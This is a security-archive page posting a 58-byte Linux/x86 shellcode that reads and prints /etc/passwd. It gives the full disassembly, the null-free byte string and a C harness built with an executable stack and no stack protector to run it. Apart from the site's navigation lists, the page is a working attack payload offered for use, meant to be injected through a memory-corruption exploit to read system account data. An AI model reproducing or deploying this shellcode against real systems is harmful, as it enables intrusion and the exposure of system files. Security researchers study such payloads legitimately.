Linux/x86 Read /etc/passwd Shellcode

Linux/x86 Read /etc/passwd Shellcode: Posted Feb 2, 2019; Authored by Kiewicz; 58 bytes small Linux/x86 read /etc/passwd shellcode.; tags | x86, shellcode; systems | linux; SHA-256 | 74c248238e27c72f2ab24fcf8b0310b4979ec41651aa62a2b154f9581a96fcaa; Download | Favorite | View

Linux/x86 Read /etc/passwd Shellcode

/* 
# Shellcode Title: Linux/x86 - Read File (/etc/passwd) (58 bytes). NULL byte free
# Date: 2019-01-31
# Author: Kiewicz (@_Kiewicz)
# Homepage: https://0xkiewicz.github.io
# Tested on: Debian/x86
# gcc -o shellcode -z execstack -fno-stack-protector shellcode.c 
# PA-7854
*/


/******************************************************************
$ objdump -d -M intel read_file

read_file:     file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
 8048060:  eb 28                  jmp    804808a <read_file>

08048062 <open>:
 8048062:  5b                     pop    ebx
 8048063:  31 c9                  xor    ecx,ecx
 8048065:  f7 e1                  mul    ecx
 8048067:  99                     cdq    
 8048068:  b0 05                  mov    al,0x5
 804806a:  cd 80                  int    0x80

0804806c <read>:
 804806c:  89 c3                  mov    ebx,eax
 804806e:  b0 03                  mov    al,0x3
 8048070:  89 e7                  mov    edi,esp
 8048072:  89 f9                  mov    ecx,edi
 8048074:  31 d2                  xor    edx,edx
 8048076:  b2 ff                  mov    dl,0xff
 8048078:  cd 80                  int    0x80

0804807a <write>:
 804807a:  89 c2                  mov    edx,eax
 804807c:  31 c0                  xor    eax,eax
 804807e:  b0 04                  mov    al,0x4
 8048080:  31 db                  xor    ebx,ebx
 8048082:  b3 01                  mov    bl,0x1
 8048084:  cd 80                  int    0x80

08048086 <exit>:
 8048086:  b0 01                  mov    al,0x1
 8048088:  cd 80                  int    0x80

0804808a <read_file>:
 804808a:  e8 d3 ff ff ff         call   8048062 <open>

0804808f <filetoread>:
 804808f:  2f                     das    
 8048090:  65 74 63               gs je  80480f6 <filetoread+0x67>
 8048093:  2f                     das    
 8048094:  70 61                  jo     80480f7 <filetoread+0x68>
 8048096:  73 73                  jae    804810b <filetoread+0x7c>
 8048098:  77 64                  ja     80480fe <filetoread+0x6f>
******************************************************************/

#include<stdio.h>
#include<string.h>

unsigned char code[] = "\xeb\x28\x5b\x31\xc9\xf7\xe1\x99\xb0\x05\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x31\xd2\xb2\xff\xcd\x80\x89\xc2\x31\xc0\xb0\x04\x31\xdb\xb3\x01\xcd\x80\xb0\x01\xcd\x80\xe8\xd3\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";

int main()
{

  printf("Shellcode Length:  %d\n", strlen(code));

  int (*ret)() = (int(*)())code;

  ret();
  return 0;
}

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Linux/x86 Read /etc/passwd Shellcode

Linux/x86 Read /etc/passwd Shellcode

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Linux/x86 Read /etc/passwd Shellcode

Share This

Linux/x86 Read /etc/passwd Shellcode

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems